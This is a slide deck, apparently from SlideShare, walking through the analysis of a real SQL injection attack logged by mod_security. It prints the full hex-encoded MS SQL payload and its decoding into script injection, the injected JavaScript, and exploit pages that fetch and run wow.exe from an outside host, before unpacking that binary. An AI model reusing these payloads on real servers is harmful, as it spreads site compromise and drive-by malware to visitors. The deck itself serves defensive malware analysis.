SlideShare a Scribd company logo

Sql injection attack_analysis_py_vo

Download as PPTX, PDF
Jirka Vejrazka
Jirka Vejrazka
Technology
1 of 36
Let’s play a game A true story of a web attack analysis
Introduction  Once upon a time, there was a personal webserver running Apache with mod_security(*) module  And then, something interesting happened... (*) An extremely useful module providing an additional level of security @JirkaV
The logfile entry  This entry appeared in the log: Message: Warning. Pattern match "(?:b(?:(?:s(?:electb(?:.{1,100}?b(?:(?:length|count|top)b.{1,100}?bfrom|fromb .{1,100}?bwhere)|.*?b(?:d(?:umpb.*bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_( ?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:;DECLARE @S CHAR(4000);SET @S. [id "950001"] [msg "SQL Injection Attack. Matched signature <cast(>"] [severity "CRITICAL"] GET /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420 7661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43 7572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379 736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642061 2E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722062 2E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C 4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B 275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D 272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074 207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043 20454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757273 6F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
The logfile entry  This entry appeared in the log: Message: Warning. Pattern match "(?:b(?:(?:s(?:electb(?:.{1,100}?b(?:(?:length|count|top)b.{1,100}?bfrom|fromb .{1,100}?bwhere)|.*?b(?:d(?:umpb.*bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_( ?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:;DECLARE @S CHAR(4000);SET @S. [id "950001"] [msg "SQL Injection Attack. Matched signature <cast(>"] [severity "CRITICAL"] GET /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420 7661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43 7572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379 736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642061 2E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722062 2E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C 4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B 275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D 272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074 207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043 20454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757273 6F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72 @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72 @JirkaV
Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 44 45 43 4C 41 D E C L A Those numbers seem to be ASCII codes in hex (base 16) 4445434C41 Let’s write a quick conversion utility ( in Python – my favourite  ) @JirkaV
Peeling the first layer  Convert to readable text: 4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204 445434C415245205461626C655F437572736F7220435552534F5220464F52... DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor from binascii import unhexlify data = '4445434C415245204054207661726368... text = [] for idx in range(len(data)/2): text.append(unhexlify(data[2*idx:2*idx+2])) print ''.join(text) @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) • update => modifies the text in the database @JirkaV
Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) • update => modifies the text in the database • injecting this HTML code, referencing a JavaScript @JirkaV
Summary #1  The SQL injection tries to modify data in the database serving HTML pages, hoping to inject a reference to malicious JavaScript code into every page in the database  Technically, it tries to modify any text in the database  Any web browser visiting the site after the attack would fetch and execute the JavaScript code So, what would the JavaScript do? @JirkaV
Analyzing the JavaScript  Download the JavaScript  Downloading JavaScript alone from its URL is relatively safe. There is no command to execute it, so the browser does not interpret it and displays it as a regular text  This makes it easy to analyze  Let’s download http://abc.verynx.cn/w.js @JirkaV
Analyzing the JavaScript  w.js analysis window.onerror=function(){return true;} if(typeof(js86h)=="undefined") { var js86h=1; function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} function y_g(name) {var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;} function cc_k() {var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime- y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}} var yesdata; yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution ='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAg ent); document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count21.51yes.com/sa.aspx?id=215052584'+yesdata+' height=0 width=0></iframe>'); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/flash.htm></iframe>"); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/123.htm></iframe>"); document.write ('<script>var a4452tf="51la";var a4452pu="";var a4452pf="51la";var a4452su=window.location;var a4452sf=document.referrer;var a4452of="";var a4452op="";var a4452ops=1;var a4452ot=1;var a4452d=new Date();var a4452color="";if (navigator.appName=="Netscape"){a4452color=screen.pixelDepth;} else {a4452color=screen.colorDepth;}</script><script>a4452tf=top.document.referrer;</script><script>a4452pu =window.parent.location;</script><script>a4452pf=window.parent.document.referrer;</script><script>a4452ops=document.cooki e.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a4452ops=(a4452ops==null)?1: (parseInt(unescape((a4452ops)[2]))+1);var a4452oe =new Date();a4452oe.setTime(a4452oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a4452ops+ ";path=/;expires="+a4452oe.toGMTString();a4452ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a4452ot==null){a4452ot=1;}else{a4452ot=parseInt(unescape((a4452ot)[2])); a4452ot=(a4452ops==1)?(a4452ot+1):(a4452ot);}a4452oe.setTime(a4452oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_o k_times="+a4452ot+";path=/;expires="+a4452oe.toGMTString();</script><script>a4452of=a4452sf;if(a4452pf!=="51la"){a4452of=a 4452pf;}if(a4452tf!=="51la"){a4452of=a4452tf;}a4452op=a4452pu;try{lainframe}catch(e){a4452op=a4452su;}document.write('<img style="display:hidden;width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for- Webmasters&svid=20&id=2024452&tpages='+a4452ops+'&ttimes='+a4452ot+'&tzone='+(0- a4452d.getTimezoneOffset()/60)+'&tcolor='+a4452color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a 4452of)+'&vpage='+escape(a4452op)+'" />');</script>'); } @JirkaV
Analyzing the JavaScript  w.js analysis – stripped down to its backbone window.onerror=function(){return true;} document.write("<iframe width=100 height=100 src=http://mm.ll80.com/flash.htm></iframe>"); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/123.htm></iframe>"); @JirkaV
Analyzing the JavaScript  Downloading the dangerous code  Since downloading the pages using a browser would do exactly what the attacker wanted, we’ll use safer approach  wget will download the HTML, but will not interpret it $ wget http://mm.ll80.com/123.htm --2008-07-23 19:55:09-- http://mm.ll80.com/123.htm Resolving mm.ll80.com... 60.173.11.119 Connecting to mm.ll80.com|60.173.11.119|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 431 [text/html] Saving to: `123.htm' @JirkaV
Analyzing the JavaScript  Side note  At this point, I’ve switched to Linux simple because the necessary tools are easily available there and the risk of doing something stupid (such as clicking on some HTML file) is a bit smaller.  Also, any possibly malicious code is slightly less likely to work – one of the reasons is that the attacker(s) seem to target Microsoft world (MS SQL, remember?) @JirkaV
Analyzing the injected HTML  Analyzing the HTML  Opening the HTML in a browser would be as bad as downloading it ... ... so we’ll use anything that does NOT understand HTML $ more 123.htm <iframe width=100 height=0 src=Ms06-014.htm> </iframe><iframe width=100 height=0 src=flash.htm> </iframe><iframe width=100 height=0 src=SP2.htm> </iframe><iframe width=100 height=0 src=Realplayer11.htm> </iframe><iframe width=100 height=0 src=Norton.htm> </iframe><iframe width=100 height=0 src=pxhack.htm> </iframe><script language="javascript“ type="text/javascript"src="http://js.users.51.la/2018815.js"></script> @JirkaV
Analyzing the injected HTML  Getting some more HTML  Time to download the other referenced HTML files  Again, using “wget”  It turns out, that each HTML file targets one vulnerability, trying to exploit it and download an executable  Let’s take a look... @JirkaV
Analyzing the injected HTML  Analyzing one exploit $ more Ms06-014.htm Svfox='http://mm.ll80.com/wow.exe'; qq853327659='C:MicroSoft.pif'; var Svfox_net=window["document"]["createElement"]("object"); Svfox_net["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var Svfox2=Svfox_net["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var Svfox3=Svfox_net["CreateObject"]("Adodb.Stream",""); Svfox3["type"]=1; www_svfox_net=gn(10000); var hHf$R6=Svfox_net["CreateObject"]("Scripting.FileSystemObject",""); var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0); www_svfox_net=hHf$R6["BuildPath"](VgDnZXHt7,www_svfox_net); var SmAcqIwGV8=Svfox_net["CreateObject"]("Shell.Application",""); exp1=hHf$R6["BuildPath"](VgDnZXHt7+'system32','cmd.exe'); SmAcqIwGV8["SHellExECuTe"](exp1,' /c echo C:MicroSoft.pif >C:MicroSoft.bat&echo del %0 >>C:MicroSoft.bat',"","open",0); @JirkaV
Analyzing the injected HTML  Another exploit $ more pxhack.htm <a href="http://www.pxhac<script defer> var objFSO = new ActiveXObject('Scripting.FileSystemObject'); var objStream = objFSO.OpenTextFile(strFile,ForWriting,true,false); objStream.WriteLine('var objArgs = 'http://mm.ll80.com/wow.exe';'); objStream.WriteLine('var objargss ='c:gtest.exe';'); objStream.WriteLine('var sGet=new ActiveXObject('ADODB.Stream');'); objStream.WriteLine('try {'); objStream.WriteLine('xGet = new XMLHttpRequest();'); objStream.WriteLine('}'); objStream.WriteLine('catch (trymicrosoft) {'); objStream.WriteLine('try {'); objStream.WriteLine('xGet = new ActiveXObject('Msxml2.XMLHTTP');'); @JirkaV
Analyzing the injected HTML  Exploits summary  All the HTML pages served only one purpose: To download wow.exe and execute it on victim’s computer  To achieve that, the attack tried to exploit multiple vulnerabilities in parallel to increase success probability.  The attack tried to exploit a web browser, flash, RealPlayer, ...  Why? Let’s see...  But first, another summary  @JirkaV
Summary #2  The SQL injection tried to modify HTML pages in the database ... It is time to look at wow.exe  ... so anyone visiting this site would run JavaScript from another site...  ... that loaded several pages with various exploits ...  ... all trying to download and execute wow.exe on our visitor’s PC ... the name rings a bell, but let’s not jump into conclusions... @JirkaV
Analyzing the binary  Checking wow.exe  Again, downloaded using wget $ xxd wow.exe | more 0000000: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0000010: b800 0000 0000 0000 4000 1a00 0000 0000 ........@....... 0000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000030: 0000 0000 0000 0000 0000 0000 0001 0000 ................ 0000040: ba10 000e 1fb4 09cd 21b8 014c cd21 9090 ........!..L.!.. 0000050: 5468 6973 2070 726f 6772 616d 206d 7573 This program mus 0000060: 7420 6265 2072 756e 2075 6e64 6572 2057 t be run under W 0000070: 696e 3332 0d0a 2437 0000 0000 0000 0000 in32..$7........ 00001f0: 0000 0000 0000 0000 5550 5830 0000 0000 ........UPX0.... 0000200: 00e0 0000 0010 0000 0000 0000 0004 0000 ................ 0000210: 0000 0000 0000 0000 0000 0000 8000 00e0 ................ 0000220: 5550 5831 0000 0000 0080 0000 00f0 0000 UPX1............ 0000230: 0076 0000 0004 0000 0000 0000 0000 0000 .v.............. 0000240: 0000 0000 4000 00e0 2e72 7372 6300 0000 ....@....rsrc... 0000250: 0010 0000 0070 0100 0002 0000 007a 0000 .....p.......z.. @JirkaV
Analyzing the binary  Unpacking $ upx -d wow.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- 43110 <- 33382 77.43% win32/pe wow.exe  But the unpacked file is still not very readable. What now?  Time for a long shot – what if it’s double-packed? $ xxd wow.exe | grep UPX 0005100: 0000 0000 0000 0000 5550 5830 0000 0000 ........UPX0.... 0005130: 5550 5831 0000 0000 0050 0000 0020 0100 UPX1.....P... .. 00052f0: 5550 5821 0d09 0209 fd3d 1daa 6ca2 d7ff UPX!.....=..l... @JirkaV
Analyzing the binary  Unpacking wow.exe – the second time $ upx -d wow.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- upx: wow.exe: NotPackedException: not packed by UPX  Obviously, there is a bit of magic going on  But we don’t really care – we know a secret  @JirkaV
Analyzing the binary  Unpacking wow.exe – the second time (again) $ xxd wow.exe | grep MZ 0000000: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0004f10: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0006c30: 4402 c34d 5a89 50fc 1920 065b aef8 4ed7 D..MZ.P.. .[..N. Hmm, it seems that we have two headers there. Time to ask Python for help again... >>> data = open('wow.exe', 'rb').read() >>> data = data[0x4f10:] >>> open('wow_int.exe', 'wb').write(data) @JirkaV
Analyzing the binary  Unpacking wow.exe – the second time (again) $ ls -lh wow* -rw-r--r-- 1 jirka users 43K 2008-07-23 07:29 wow.exe -rw-r--r-- 1 jirka users 23K 2008-08-02 01:02 wow_int.exe $ upx -d wow_int.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- 44886 <- 22870 50.95% win32/pe wow_int.exe @JirkaV
Analyzing the binary  Unpacking wow.exe – the second time (again) $ strings wow_int.exe | more TObject u:hD SVWUQ SOFTWAREBlizzard EntertainmentWorld of Warcraft cn4.grunt.wowchina.com cn6.grunt.wowchina.com kr.logon.worldofwarcraft.com eu.logon.worldofwarcraft.com tw.logon.worldofwarcraft.com /flash.asp QQQQQ3 ZYYd offline action= update @JirkaV
Conclusion  What next?  The next step would be figuring out what exactly the code does with World of Warcraft... ...but games are not my cup of tea so I’ll stop here. @JirkaV
Overall Summary  So, the attack was using vulnerable web server to attack its clients.  Each client would be attacked using range of exploits in order to download and execute double-packed file  This file would contact World of Warcraft servers @JirkaV

Recommended

Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacksNitish Kumar
 
Protecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacksProtecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacksKevin Alcock
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)guest32e5cfe
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Pichaya Morimoto
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)Shivam Sahu
 

Recommended

Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacksNitish Kumar
 
Protecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacksProtecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacksKevin Alcock
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)guest32e5cfe
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
